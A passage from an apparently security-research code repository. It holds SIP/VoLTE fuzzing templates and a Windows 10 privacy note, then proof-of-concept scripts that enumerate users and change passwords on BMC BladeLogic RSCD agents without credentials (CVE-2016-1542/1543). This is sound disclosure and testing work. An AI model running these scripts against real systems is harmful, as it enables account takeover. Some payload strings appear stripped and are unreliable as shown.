field("blank8", 8, " ", none), 117 | field("lt3", 8, "<", none), 118 | field("prot5", 24, "sip", none), 119 | field("sep17", 8, ":", none), 120 | field("impuHostContact", None, impu_host, none), 121 | field("sep18", 8, "@", none), 122 | list("ipContList", ip_src, "dizzes/sip/faultyIP.txt"), 123 | #field("ip_gw3", len(ip_src)*8, ip_src, none), 124 | field("sep19", 8, ":", none), 125 | list("contactPortList", port_src, "dizzes/sip/integer.txt"), 126 | field("gt3", 8, ">", none), 127 | field("crlf9", 16, "\x0d\x0a", none), 128 | #P-Preferred-Identity: 129 | field("prefID", None, "P-Preferred-Identity", none), 130 | field("prefIDCol", 8, ":", none), 131 | field("prefIDblank", 8, " ", none), 132 | field("prefIDlt1", 8, "<", none), 133 | field("prefIDprot3", 24, "sip", none), 134 | field("prefIDsep6", 8, ":", none), 135 | field("prefIDImpuHost", None, impu_host, none), 136 | field("prefIDsep7", 8, "@", none), 137 | field("prefIDDomain", None, domain, std), 138 | field("prefIDgt1", 8, ">", none), 139 | field("prefIDcrlf", 16, "\x0d\x0a", none), 140 | #Privacy: none 141 | field("privacy", None, "Privacy", none), 142 | field("scolPrivacy", 8, ":", none), 143 | field("spacePrivacy", 8, " ", none), 144 | field("PrivacyNone", None, "none", none), 145 | field("crlfPrivacy", 16, "\x0d\x0a", none), 146 | #User-Agent: Cisco-SIPIPCommunicator/9.1.1 147 | field("name8", 80, "User-Agent", none), 148 | field("sep21", 8, ":", none), 149 | field("string", None, " Cisco-SIPIPCommunicator", none), 150 | field("sep22", 8, "/", none), 151 | field("version", None, "9.1.1", none), 152 | field("crlf10", 16, "\x0d\x0a", none), 153 | #P-Access-Network-Info: 3GPP-UTRAN-TDD; utran-cell-id-3gpp=00000000 154 | field("PAccess", None, "P-Access-Network-Info", none), 155 | field("scolPAccess", 8, ":", none), 156 | field("spacePAccess", 8, " ", none), 157 | field("PAccessValue", None, "3GPP-UTRAN-TDD", none), 158 | field("commPAccess", 8, ";", none), 159 | field("spacePAccess2", 8, " ", none), 160 | 
field("utranCell", None, "utran-cell-id-3gpp", none), 161 | field("equPAccess", 8, "=", none), 162 | field("utranValue", None, "00000000", none), 163 | field("crlfPAccess", 16, "\x0d\x0a", none), 164 | #Content-Length: 10 165 | field("ContLength", None, "Content-Length", none), 166 | field("sepContLen", 8, ":", none), 167 | field("blankContLen", 8, " ", none), 168 | list("Content-Length", "0", "dizzes/sip/integer.txt"), 169 | #field("Content-Length", None, "0", none), 170 | field("crlfContLen", 16, "\x0d\x0a", none), 171 | field("crlfLast", 16, "\x0d\x0a", none), 172 | #Message 173 | field("messageText", None, "Text Message", none) 174 | ] 175 | 176 | functions=[] 177 | -------------------------------------------------------------------------------- /VoLTE-dizzy/methods.txt: -------------------------------------------------------------------------------- 1 | REGISTER 2 | INVITE 3 | ACK 4 | CANCEL 5 | OPTIONS 6 | BYE 7 | REFER 8 | NOTIFY 9 | MESSAGE 10 | SUBSCRIBE 11 | INFO 12 | UPDATE 13 | register 14 | invite 15 | INVite 16 | REGISTeR 17 | INVITE! 
18 | REGISTER; 19 | REGISTER0 20 | INVITE1 -------------------------------------------------------------------------------- /VoLTE-dizzy/register.dizz: -------------------------------------------------------------------------------- 1 | #SIP Register 2 | 3 | ip_src = "192.168.56.101" 4 | ip_dst = "192.168.56.102" 5 | port_src = "5060" 6 | port_dst = "4060" 7 | impu_host = "alice" 8 | impi_host = "alice" 9 | domain = "open-ims.test" 10 | 11 | name = "SIP Register" 12 | 13 | objects = [ 14 | #REGISTER sip:open-ims.test SIP/2.0 15 | list("Method", "REGISTER", "dizzes/sip/methods.txt"), 16 | field("blank1", 8, " ", none), 17 | field("prot1", 24, "sip", none), 18 | field("sep1",8, ":", none), 19 | field("reqURI", 104, domain,none), 20 | field("blank2", 8, " ", none), 21 | field("sip_version", 56, "SIP/2.0", none), 22 | field("crlf1",16, "\x0d\x0a", none), 23 | # Via: SIP/2.0/UDP 192.168.56.101:5060;branch=z9hG4bK41760951933bd19eaccc65c1e80dd321 24 | field("via", 24, "Via", none), 25 | field("sep2", 8, ":", none), 26 | field("blank3", 8, " ", none), 27 | field("prot2", 88, "SIP/2.0/UDP", none), 28 | field("blank4", 8, " ", none), 29 | list("ipViaList", ip_src, "dizzes/sip/faultyIP.txt"), 30 | field("separator3", 8, ":", none), 31 | field("port1", None, port_src, none), 32 | field("sep3", 8, ";", none), 33 | field("tag28", 48, "branch", none), 34 | field("equal1", 8, "=", none), 35 | field("branch" , None, "z9hG4bKnp151248737", std), 36 | field("crlf2", 16, "\x0d\x0a", none), 37 | # From: ;tag=1000 38 | field("name2", 32, "From", none), 39 | field("sep5", 8, ":", none), 40 | field("blank5", 8, " ", none), 41 | field("fromName", None, '"Alice"', none), 42 | field("blank51", 8, " ", none), 43 | field("lt1", 8, "<", none), 44 | field("prot3", 24, "sip", none), 45 | field("sep6", 8, ":", none), 46 | field("impuHost", None, impu_host, std), 47 | field("sep7", 8, "@", none), 48 | field("domain", None, domain, none), 49 | field("gt1", 8, ">", none), 50 | field("sep8", 8, ";", 
none), 51 | field("tag343", 24, "tag", none), 52 | field("equal8", 8, "=", none), 53 | field("tag2", None, "903df0a", std), 54 | field("crlf3", 16, "\x0d\x0a", none), 55 | # To: "Alice" 56 | field("name3",16, "To", none), 57 | field("sep9", 8, ":", none), 58 | field("blankTo", 8, " ", none), 59 | field("ToName", None, '"Alice"', none), 60 | field("blankTo1", 8, " ", none), 61 | field("lt2", 8, "<", none), 62 | field("prot4", 24, "sip", none), 63 | field("sep10", 8, ":", none), 64 | field("impuHost2", None, impu_host, none), 65 | field("sep11", 8, "@", none), 66 | field("domainTo", None, domain, none), 67 | field("gt2", 8, ">", none), 68 | field("crlf4", 16, "\x0d\x0a", none), 69 | # Call-ID: 0cc2f546f119c58fcdf0eaf43a6b7e01@192.168.56.101 70 | field("name4", 56, "Call-ID", none), 71 | field("sep12", 16, ": ", none), 72 | field("call_id", None, "0cc2f546f119c58fcdf0eaf43a6b7e01", std), 73 | field("crlf5", 16, "\x0d\x0a", none), 74 | # Max-Forwards: 70 75 | field("name5", 96, "Max-Forwards", none), 76 | field("sep13", 16, ": ", none), 77 | list("maxForwards", "70", "dizzes/sip/integer.txt"), 78 | field("crlf6", 16, "\x0d\x0a", none), 79 | # Date: Mon, 19 Sep 2015 08:22:57 GMT 80 | field("name6", 32, "Date", none), 81 | field("sep14", 8, ":", none), 82 | field("date", None, "Mon, 19 Sep 2015 08:22:57 GMT", none), 83 | field("crlf7", 16, "\x0d\x0a", none), 84 | # CSeq: 101 REGISTER 85 | field("name7", 32, "CSeq", none), 86 | field("sep15", 8, ":", none), 87 | field("blank6", 8, " ", none), 88 | list("CSeqNum", "101", "dizzes/sip/integer.txt"), 89 | field("blank7", 8, " ", none), 90 | list("method2", "REGISTER", "dizzes/sip/methods.txt"), 91 | field("crlf8", 16, "\x0d\x0a", none), 92 | # Contact: 93 | field("name9", 56, "Contact", none), 94 | field("sep16", 8, ":", none), 95 | field("blank8", 8, " ", none), 96 | field("lt3", 8, "<", none), 97 | field("prot5", 24, "sip", none), 98 | field("sep17", 8, ":", none), 99 | field("impuHostContact", None, impu_host, none), 100 | 
field("sep18", 8, "@", none), 101 | list("ipContList", ip_src, "dizzes/sip/faultyIP.txt"), 102 | field("sep19", 8, ":", none), 103 | list("contactPortList", port_src, "dizzes/sip/integer.txt"), 104 | field("sep20", 8, ";", none), 105 | field("tag3", None, "line", none), 106 | field("equal2", 8, "=", none), 107 | field("tag4", None, "9c7d2db8822013c", none), 108 | field("gt3", 8, ">", none), 109 | field("crlf9", 16, "\x0d\x0a", none), 110 | #Authorization: Digest username="alice@open-ims.test",realm="open-ims.test",nonce="",response="",uri="sip:open-ims.test" 111 | #algorithm=MD5,response="18e2ebf76671e63abb1c706d7a1b4f07",qop=auth-int,nc=00000001,cnonce="555650101551029857" 112 | field("authorization", None, "Authorization", none), 113 | field("scolAuth", 8, ":", none), 114 | field("spaceAuth", 8, " ", none), 115 | field("authMethod", None, "Digest", none), 116 | field("spaceeAuth", 8, " ", none), 117 | field("username", None, "username", none), 118 | field("equalsAuth", 8, "=", none), 119 | field("quoteAuth1", 8, '"', none), 120 | field("impiHostAuth", None, impi_host, std), 121 | field("atAuth", 8, "@", none), 122 | field("domainAuth", None, domain, none), 123 | field("quoteAuth2", 8, '"', none), 124 | field("commaAuth2", 8, ",", none), 125 | field("realm", None, "realm", none), 126 | field("equalAuth2", 8, "=", none), 127 | field("quoteAuth3", 8, '"', none), 128 | field("realmValue", None, domain, none), 129 | field("quoteAuth4", 8, '"', none), 130 | field("commaAuth3", 8, ",", none), 131 | field("nonce", None, "nonce", none), 132 | field("equalAuth3", 8, "=", none), 133 | field("quoteAuth5", 8, '"', none), 134 | field("nonceValue", None, "15f0c5d6969d36daa1c8eaddcf27db05", std), 135 | field("quoteAuth6", 8, '"', none), 136 | field("commaAuth4", 8, ",", none), 137 | field("authResponse", None, "response", none), 138 | field("equalAuth8", 8, "=", none), 139 | field("quoteAuth9", 8, '"', none), 140 | field("authResponseValue", None, 
"d1b41c044bfcffdec1db539a41470d77", none), 141 | field("quoteAuth10", 8, '"', none), 142 | field("commaAuth7", 8, ",", none), 143 | field("authURI", None, "uri", none), 144 | field("equalAuth4", 8, "=", none), 145 | field("quoteAuth7", 8, '"', none), 146 | field("authValue", None, "sip:"+domain, none), 147 | field("quoteAuth8", 8, '"', none), 148 | field("commaAuth5", 8, ",", none), 149 | field("authAlgorithm", None, "algorithm", none), 150 | field("equalAuth10", 8, "=", none), 151 | field("authAlgorithmValue", None, "MD5", none), 152 | field("commaAuth8", 8, ",", none), 153 | field("authQop", None, "qop", none), 154 | field("equalAuth5", 8, "=", none), 155 | field("authQopValue", None, "auth-int", none), 156 | field("commaAuth6", 8, ",", none), 157 | field("authnc", None, "nc", none), 158 | field("equalAuth6", 8, "=", none), 159 | field("authNCValue", None, "00000001", none), 160 | field("commaAuth61", 8, ",", none), 161 | field("authCnonce", None, "cnonce", none), 162 | field("equalAuth7", 8, "=", none), 163 | field("quoteAuth11", 8, '"', none), 164 | field("authCnonceValue", None, "6053256d", none), 165 | field("quoteAuth12", 8, '"', none), 166 | #field("authOpaque", None, "opaque", none), 167 | #field("equalAuth9", 8, "=", none), 168 | #field("authOpaqueValue", None, '"aW1zLmNvbS5jbg=="', none), 169 | #field("commaAuth9", 8, ",", none), 170 | field("crlfAuth", 16, "\x0d\x0a", none), 171 | # Expires: 3600 172 | field("nameEx", None, "Expires", none), 173 | field("sepSeEx", 8, ":", none), 174 | field("spaceSeEx", 8, " ", none), 175 | list("esExValue", "3600", "dizzes/sip/integer.txt"), 176 | field("crlfSeEx", 16, "\x0d\x0a", none), 177 | #Supported: path 178 | field("supported", None, "Supported", none), 179 | field("scolSupport", 8, ":", none), 180 | field("spaceSupport", 8, " ", none), 181 | field("supportedValue", None, "path", none), 182 | field("crlfSupported", 16, "\x0d\x0a", none), 183 | #P-Preferred-Identity: 184 | field("prefID", None, 
"P-Preferred-Identity", none), 185 | field("prefIDCol", 8, ":", none), 186 | field("prefIDblank", 8, " ", none), 187 | field("prefIDlt1", 8, "<", none), 188 | field("prefIDprot3", 24, "sip", none), 189 | field("prefIDsep6", 8, ":", none), 190 | field("prefIDImpuHost", None, impu_host, none), 191 | field("prefIDsep7", 8, "@", none), 192 | field("prefIDDomain", None, domain, std), 193 | field("prefIDgt1", 8, ">", none), 194 | field("prefIDcrlf", 16, "\x0d\x0a", none), 195 | #User-Agent: Cisco-SIPIPCommunicator/9.1.1 196 | field("name8", 80, "User-Agent", none), 197 | field("sep21", 8, ":", none), 198 | field("string", None, " Cisco-SIPIPCommunicator", none), 199 | field("sep22", 8, "/", none), 200 | field("version", None, "9.1.1", none), 201 | field("crlf10", 16, "\x0d\x0a", none), 202 | #Allow: INVITE,ACK,CANCEL,BYE,MESSAGE,NOTIFY 203 | field("allow", None, "Allow", none), 204 | field("sepAllow", 8, ":", none), 205 | field("blankAllow", 8, " ", none), 206 | field("methodsAllow", None, "INVITE,ACK,CANCEL,BYE,MESSAGE,NOTIFY", none), 207 | field("crlfAllowEvents", 16, "\x0d\x0a", none), 208 | #P-Access-Network-Info: 3GPP-UTRAN-TDD; utran-cell-id-3gpp=00000000 209 | field("PAccess", None, "P-Access-Network-Info", none), 210 | field("scolPAccess", 8, ":", none), 211 | field("spacePAccess", 8, " ", none), 212 | field("PAccessValue", None, "3GPP-UTRAN-TDD", none), 213 | field("commPAccess", 8, ";", none), 214 | field("spacePAccess2", 8, " ", none), 215 | field("utranCell", None, "utran-cell-id-3gpp", none), 216 | field("equPAccess", 8, "=", none), 217 | field("utranValue", None, "00000000", none), 218 | field("crlfPAccess", 16, "\x0d\x0a", none), 219 | #Privacy: none 220 | field("privacy", None, "Privacy", none), 221 | field("scolPrivacy", 8, ":", none), 222 | field("spacePrivacy", 8, " ", none), 223 | field("PrivacyNone", None, "none", none), 224 | field("crlfPrivacy", 16, "\x0d\x0a", none), 225 | #Content-Length: 0 226 | field("ContLength", None, "Content-Length", none), 
227 | field("sepContLen", 8, ":", none), 228 | field("blankContLen", 8, " ", none), 229 | list("Content-Length", "0", "dizzes/sip/integer.txt"), 230 | #field("Content-Length", none, "0", none), 231 | field("crlfContLen", 16, "\x0d\x0a", none), 232 | # Close Header with CRLF 233 | field("crlf11", 16, "\x0d\x0a", none), 234 | ] 235 | 236 | functions=[] 237 | -------------------------------------------------------------------------------- /VoLTE-dizzy/subscribe.dizz: -------------------------------------------------------------------------------- 1 | #SIP Subscribe 2 | 3 | ip_src = "192.168.56.101" 4 | ip_dst = "192.168.56.103" 5 | port_src = "5061" 6 | port_dst = "4060" 7 | impu_host = "alice" 8 | domain = "open-ims.test" 9 | 10 | name = "SIP Subscribe" 11 | 12 | objects = [ 13 | #SUBSCRIBE sip:alice@open-ims.test SIP/2.0 14 | list("Method", "SUBSCRIBE", "dizzes/sip/methods.txt"), 15 | #field("Method", None, "SUBSCRIBE", none), 16 | field("blank1", 8, " ", none), 17 | field("prot1", 24, "sip", none), 18 | field("sep1",8, ":", none), 19 | field("reqHost",None, impu_host, none), 20 | field("reqAt",8, "@", none), 21 | field("reqURI",104,domain,none), 22 | field("blank2", 8, " ", none), 23 | field("sip_version", 56, "SIP/2.0", none), 24 | field("crlf1",16, "\x0d\x0a", none), 25 | # Call-ID: 661ad2611d7898d6cc7dd31a9d9cb2ed@127.0.0.1 26 | field("nameCID", 56, "Call-ID", none), 27 | field("sepCID", 16, ": ", none), 28 | field("CallID", None, "0cc2f546f119c58fcdf0eaf43a6b7e01", none), 29 | #field("separator12", 8, "@", none), 30 | #field("call_id2", None, ip_src, none), 31 | field("crlf5", 16, "\x0d\x0a", none), 32 | # CSeq: 101 SUBSCRIBE 33 | field("nameCSeq", 32, "CSeq", none), 34 | field("sepCSeq", 8, ":", none), 35 | field("blankCSeq", 8, " ", none), 36 | list("CSeqNum", "101", "dizzes/sip/integer.txt"), 37 | # field("CSeqNumField", None, "1", none), 38 | field("blankCSeq2", 8, " ", none), 39 | list("methodCSeq", "SUBSCRIBE", "dizzes/sip/methods.txt"), 40 | 
field("crlf8", 16, "\x0d\x0a", none), 41 | # Via: SIP/2.0/UDP 192.168.56.101:5060;branch=z9hG4bK41760951933bd19eaccc65c1e80dd321 42 | field("via", 24, "Via", none), 43 | field("sep2", 8, ":", none), 44 | field("blank3", 8, " ", none), 45 | field("prot2", 88, "SIP/2.0/UDP", none), 46 | field("blank4", 8, " ", none), 47 | #field("ipVia", len(ip_src)*8, ip_src, none), 48 | list("ipViaList", ip_src, "dizzes/sip/faultyIP.txt"), 49 | field("separator3", 8, ":", none), 50 | field("port1", None, port_src, none), 51 | field("sep3", 8, ";", none), 52 | field("tag28", 48, "branch", none), 53 | field("equal1", 8, "=", none), 54 | field("branch", None, "z9hG4bKnp151248737", none), 55 | field("crlf2", 16, "\x0d\x0a", none), 56 | # From: ;tag=1000 57 | field("name2", 32, "From", none), 58 | field("sep5", 8, ":", none), 59 | field("blank5", 8, " ", none), 60 | field("fromName", None, '"Alice"', none), 61 | field("blank51", 8, " ", none), 62 | field("lt1", 8, "<", none), 63 | field("prot3", 24, "sip", none), 64 | field("sep6", 8, ":", none), 65 | field("impuHost", None, impu_host, none), 66 | field("sep7", 8, "@", none), 67 | field("domain", None, domain, none), 68 | field("gt1", 8, ">", none), 69 | field("sep8", 8, ";", none), 70 | field("tag343", 24, "tag", none), 71 | field("equal8", 8, "=", none), 72 | field("tag2", None, "903df0a", none), 73 | field("crlf3", 16, "\x0d\x0a", none), 74 | # To: "Alice" 75 | field("name3",16, "To", none), 76 | field("sep9", 8, ":", none), 77 | field("blankTo", 8, " ", none), 78 | field("ToName", None, '"Alice"', none), 79 | field("blankTo1", 8, " ", none), 80 | field("lt2", 8, "<", none), 81 | field("prot4", 24, "sip", none), 82 | field("sep10", 8, ":", none), 83 | field("impuHost2", None, impu_host, none), 84 | field("sep11", 8, "@", none), 85 | field("domainTo", None, domain, none), 86 | field("gt2", 8, ">", none), 87 | field("crlf4", 16, "\x0d\x0a", none), 88 | # Max-Forwards: 70 89 | field("name5", 96, "Max-Forwards", none), 90 | 
field("sep13", 16, ": ", none), 91 | list("maxForwards", "70", "dizzes/sip/integer.txt"), 92 | #field("max_forwards", None, "70", std), 93 | field("crlf6", 16, "\x0d\x0a", none), 94 | # Route: 95 | field("nameRoute", 40, "Route", none), 96 | field("sepR1", 8, ":", none), 97 | field("blankR1", 8, " ", none), 98 | field("ltR1", 8, "<", none), 99 | field("protR1", 24, "sip", none), 100 | field("sepR2", 8, ":", none), 101 | field("theWholeRoute",None,"orig@scscf.open-ims.test",std), 102 | field("sepR3", 8, ":", none), 103 | list("portR2", "6060", "dizzes/sip/integer.txt"), 104 | field("sepR5", 8, ";", none), 105 | field("lr", 16, "lr", none), 106 | field("gtR3", 8, ">", none), 107 | field("crlfRoute", 16, "\x0d\x0a", none), 108 | # Contact: 109 | field("name9", 56, "Contact", none), 110 | field("sep16", 8, ":", none), 111 | field("blank8", 8, " ", none), 112 | field("lt3", 8, "<", none), 113 | field("prot5", 24, "sip", none), 114 | field("sep17", 8, ":", none), 115 | field("impuHostContact", None, impu_host, none), 116 | field("sep18", 8, "@", none), 117 | list("ipContList", ip_src, "dizzes/sip/faultyIP.txt"), 118 | #field("ip_gw3", len(ip_src)*8, ip_src, none), 119 | field("sep19", 8, ":", none), 120 | list("contactPortList", port_src, "dizzes/sip/integer.txt"), 121 | field("gt3", 8, ">", none), 122 | field("crlf9", 16, "\x0d\x0a", none), 123 | # Expires: 600 124 | field("nameEx", None, "Expires", none), 125 | field("sepSeEx", 8, ":", none), 126 | field("spaceSeEx", 8, " ", none), 127 | list("esExValue", "600", "dizzes/sip/integer.txt"), 128 | field("crlfSeEx", 16, "\x0d\x0a", none), 129 | # Accept: application/pidf+xml 130 | field("accept", None, "Accept", none), 131 | field("scolAccept", 8, ":", none), 132 | field("spaceAccept", 8, " ", none), 133 | field("AcceptValue", None, "application/pidf+xml", std), 134 | field("crlfAccept", 16, "\x0d\x0a", none), 135 | # Event: reg 136 | field("event", None, "Event", none), 137 | field("eventCol", 8, ":", none), 138 | 
field("eventblank", 8, " ", none), 139 | field("eventType", None, "reg", std), 140 | field("prefIDcrlf", 16, "\x0d\x0a", none), 141 | #User-Agent: Cisco-SIPIPCommunicator/9.1.1 142 | field("name8", 80, "User-Agent", none), 143 | field("sep21", 8, ":", none), 144 | field("string", None, " Cisco-SIPIPCommunicator", none), 145 | field("sep22", 8, "/", none), 146 | field("version", None, "9.1.1", none), 147 | field("crlf10", 16, "\x0d\x0a", none), 148 | #Content-Length: 0 149 | field("ContLength", None, "Content-Length", none), 150 | field("sepContLen", 8, ":", none), 151 | field("blankContLen", 8, " ", none), 152 | list("Content-Length", "0", "dizzes/sip/integer.txt"), 153 | #field("Content-Length", None, "0", none), 154 | field("crlfContLen", 16, "\x0d\x0a", none), 155 | # Close Header with CRLF 156 | field("crlf11", 16, "\x0d\x0a", none), 157 | ] 158 | 159 | functions=[] 160 | -------------------------------------------------------------------------------- /Win10-privacy/README.md: -------------------------------------------------------------------------------- 1 | This sheet presents suggestions regarding Microsoft Windows 10 privacy settings via Active Directory Group Policies and gives information about the corresponding Windows Registry keys. For more information on the impact of the default configuration and a detailed explanation of our recommendations refer to the [ERNW Newsletter 52](https://www.ernw.de/newsletter/newsletter-52-february-2016-some-recommendations-regarding-windows-10-privacy-settings/). 
2 | -------------------------------------------------------------------------------- /Win10-privacy/Win10_Recommendation_1.0.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ernw/insinuator-snippets/837feffb79db74cc1566541c3373db315e817ba0/Win10-privacy/Win10_Recommendation_1.0.xlsx -------------------------------------------------------------------------------- /bmc_bladelogic/README.md: -------------------------------------------------------------------------------- 1 | These scripts exploit CVE-2016-1542 (BMC-2015-0010) and CVE-2016-1543 (BMC-2015-0011) in the BMC BladeLogic RSCD agent. Detailed information can be found here: https://www.insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/ 2 | Use getUsers.py to enumerate the local users of a target and changePwd.py to set a new password for one of them; neither script takes any agent credentials (only host, port, and — for changePwd.py — the user name and new password), which is what makes the issues exploitable. Both were written against agent version 8.6.01.66 and are proof-of-concept code for authorised testing only. 3 | -------------------------------------------------------------------------------- /bmc_bladelogic/changePwd.py: -------------------------------------------------------------------------------- 1 | # Demonstration of the unauthorized password change functionality with BMC BladeLogic RSCD agent v8.6.01.66 2 | # Copyright: ERNW 3 | 4 | 5 | import socket 6 | import ssl 7 | import sys 8 | import argparse 9 | import requests 10 | from requests.packages.urllib3 import PoolManager, HTTPConnectionPool 11 | #If you encounter problems with import, try to comment the previous line and use the following one instead 12 | #from urllib3 import PoolManager, HTTPConnectionPool, connectionpool 13 | 14 | try: 15 | from http.client import HTTPConnection 16 | except ImportError: 17 | from httplib import HTTPConnection 18 | 19 | class MyHTTPConnection(HTTPConnection): 20 | def connect(self): 21 | self.sock = wrappedSocket 22 | if self._tunnel_host: 23 | self._tunnel() 24 | 25 | requests.packages.urllib3.connectionpool.HTTPConnection = MyHTTPConnection 26 | #If you used the alternative import,
# comment the previous line and uncomment the following instead
#connectionpool.HTTPConnection = MyHTTPConnection

# NOTE(review): this is a Python 2 script (print statements, httplib
# fallback above); sendall("TLSRPC") and the str payloads would have to
# become bytes on Python 3.
# NOTE(review): in this rendering the XML-RPC envelope (methodCall /
# methodName / params tags) has been stripped from the payload literals
# below -- as shown they are not valid XML-RPC. Take them from the
# original source file, not from this listing.

def optParser():
    """Parse the command line.

    Positional: host (IP of the RSCD agent), user (account whose
    password is replaced), password (the new password).
    Optional: -p/--port, TCP port of the agent (default 4750).
    Returns the argparse Namespace.
    """
    parser = argparse.ArgumentParser(description="Test for password change with BMC BladeLogic Server Automation RSCD agent")
    parser.add_argument("host", help="IP address of a target system")
    parser.add_argument("-p", "--port", type=int, default=4750, help="TCP port (default: 4750)")
    parser.add_argument("user", help="User whom the password belongs to")
    parser.add_argument("password", help="New password")
    opts=parser.parse_args()
    return opts

def sendXMLRPC(host,port,packet):
    """POST `packet` to the agent's /xmlrpc endpoint and print status and body.

    host/port only appear in the URL: MyHTTPConnection.connect() (above)
    substitutes the module-level `wrappedSocket`, so every request is
    written to the TLS session opened further down rather than to a new
    plaintext connection, despite the http:// scheme.
    Returns None; exceptions from requests propagate to the caller.
    """
    r=requests.post('http://'+host+':'+str(port)+'/xmlrpc',data=packet)
    print r.status_code
    print r.content
    return

# Server introduction request
# (client self-identification the agent expects before a DAAL call; the
#  XXX fields are placeholders.  Per the note at the bottom the agent may
#  answer it with "No authorization to access host" -- that does not
#  stop the password change request that follows.)

intro = """RemoteServer.intro2016-1-14-18-10-30-392095870;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;8.6.01.66"""
options=optParser()
user=options.user
newPass=options.password
PORT=options.port
HOST=options.host

# Request to update password of a specific user
# NOTE(review): `user` and `newPass` are spliced into the XML body
# unescaped.  A value containing '<', '>' or '&' yields malformed XML and
# an unhelpful failure from the agent; xml.sax.saxutils.escape() on both
# values would make the tool work for arbitrary passwords.

updatePwd = """DAAL.performActiontypeNameBMC_UnixUserhost0.0.0.0containerstringIS_LIVEvaluelongValue1kind1path/"""+str(user)+"""updatePasswordstringnewPasswordvaluestringValue"""+str(newPass)+"""kind20"""

# Plain TCP to the agent; TLS is negotiated only after the preamble.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))

# Initial packet which will trigger XMLRPC communication
sock.sendall("TLSRPC")
# NOTE(review): ssl.wrap_socket() as called here (no cert_reqs /
# ca_certs) does not validate the agent's certificate, so the session
# can be intercepted; acceptable for a lab PoC, not beyond that.  The
# function is also deprecated and removed in Python 3.12
# (ssl.SSLContext().wrap_socket() is the replacement).
wrappedSocket = ssl.wrap_socket(sock)

# Sending both XMLRPC requests
# Important: response to the first request might be "No authorization to access host".
# That does not mean that the second request will not work!
67 | # When the response to the second request is errorCode 0 - it worked 68 | 69 | sendXMLRPC(HOST,PORT,intro) 70 | sendXMLRPC(HOST,PORT,updatePwd) 71 | 72 | wrappedSocket.close() 73 | 74 | -------------------------------------------------------------------------------- /bmc_bladelogic/getUsers.py: -------------------------------------------------------------------------------- 1 | # Retrieving system users with BMC BladeLogic RSCD agent (checked for v8.6.01.66) 2 | # Copyright: ERNW 3 | 4 | import socket 5 | import ssl 6 | import sys 7 | import requests 8 | import argparse 9 | import xml.etree.ElementTree as ET 10 | from requests.packages.urllib3 import PoolManager, HTTPConnectionPool 11 | #If you encounter problems with import, try to comment the previous line and use the following one instead 12 | #from urllib3 import PoolManager, HTTPConnectionPool, connectionpool 13 | try: 14 | from http.client import HTTPConnection 15 | except ImportError: 16 | from httplib import HTTPConnection 17 | 18 | class MyHTTPConnection(HTTPConnection): 19 | def connect(self): 20 | self.sock = wrappedSocket 21 | if self._tunnel_host: 22 | self._tunnel() 23 | 24 | requests.packages.urllib3.connectionpool.HTTPConnection = MyHTTPConnection 25 | #If you used the alternative import, comment the previous line and uncomment the following instead 26 | #connectionpool.HTTPConnection = MyHTTPConnection 27 | 28 | def optParser(): 29 | parser = argparse.ArgumentParser(description="Retrieving system users with BMC BladeLogic Server Automation RSCD agent") 30 | parser.add_argument("host", help="IP address of a target system") 31 | parser.add_argument("-p", "--port", type=int, default=4750, help="TCP port (default: 4750)") 32 | opts=parser.parse_args() 33 | return opts 34 | 35 | # Server introduction request 36 | init = """RemoteServer.intro2015-11-19-16-10-30-392095870;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;8.6.01.66""" 37 | 38 | 
getVersion="""RemoteServer.getVersion"""

# DAAL calls: open a stream of BMC_UnixUsers children, pull from it, and
# close it.  The host "0.0.0.0" and the session/stream ids are literal
# values taken from a captured session.
# NOTE(review): as with `init` above, the XML-RPC envelope (methodCall /
# methodName / params tags) has been stripped from these literals in
# this rendering -- they are not valid XML-RPC as shown; use the
# original source file.
getUsers="""DAAL.getAssetChildrenStreamtypeNameBMC_UnixUsershost0.0.0.0containerstringIS_LIVEvaluelongValue1kind1path/1"""

getNext="""DAAL.assetStreamGetNextstreamIDsessionId2100"""

closeAsset="""DAAL.assetStreamClosestreamIDsessionId2"""

options=optParser()
PORT=options.port
HOST=options.host

# Plain TCP first; the agent switches to TLS after the "TLSRPC" preamble.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))

# Initial packet which will trigger XMLRPC communication
sock.sendall("TLSRPC")
# NOTE(review): no certificate validation (no cert_reqs / ca_certs), so
# the TLS session does not authenticate the agent -- lab-PoC only.
# ssl.wrap_socket() is deprecated and removed in Python 3.12.
wrappedSocket = ssl.wrap_socket(sock)

# Every requests.post() below goes through MyHTTPConnection (above), i.e.
# over `wrappedSocket`; HOST/PORT in the URL are cosmetic.  Python 2
# script (print statements).
print "Sending intro..."
r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=init)
#print r.status_code
r.content   # bare expression: consumes the response body, result discarded
print "Getting version..."
r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getVersion)
#print r.status_code
#print r.content
# NOTE(review): the agent-controlled reply is parsed with stock
# xml.etree, which is not hardened against hostile XML (entity
# expansion etc.).  The fixed index paths below raise IndexError, or
# TypeError when an element is empty (.text is None), if the response
# shape differs from the 8.6.01.66 agent this was written against.
rootVersion = ET.fromstring(r.content)
print "========================="
print "Major version: " + rootVersion[0][0][0][0][0][1].text
print "Minor version: " + rootVersion[0][0][0][0][1][1].text
print "Patch version: " + rootVersion[0][0][0][0][2][1].text
print "Platform version: " + rootVersion[0][0][0][0][3][1].text
print "=========================\n"

print "Sending request for users...\n"
r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getUsers)
#print r.status_code
r.content
r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getNext)
#print r.status_code
# The raw listing is written to the current directory (overwritten on
# every run) so it can be inspected if the index-based parsing further
# down fails.  It holds account details of the target -- treat the file
# as sensitive output.
with open("./users.xml", "w") as text_file:
    text_file.write(r.content)

# A second getNext is sent and its reply dropped (presumably to reach
# end-of-stream before closing -- not verified here), then the stream is
# closed.
r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getNext)
#print r.status_code
r.content
r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=closeAsset)
#print r.status_code
r.content


# Parsing the response
# If parsing does not work correctly, the users'
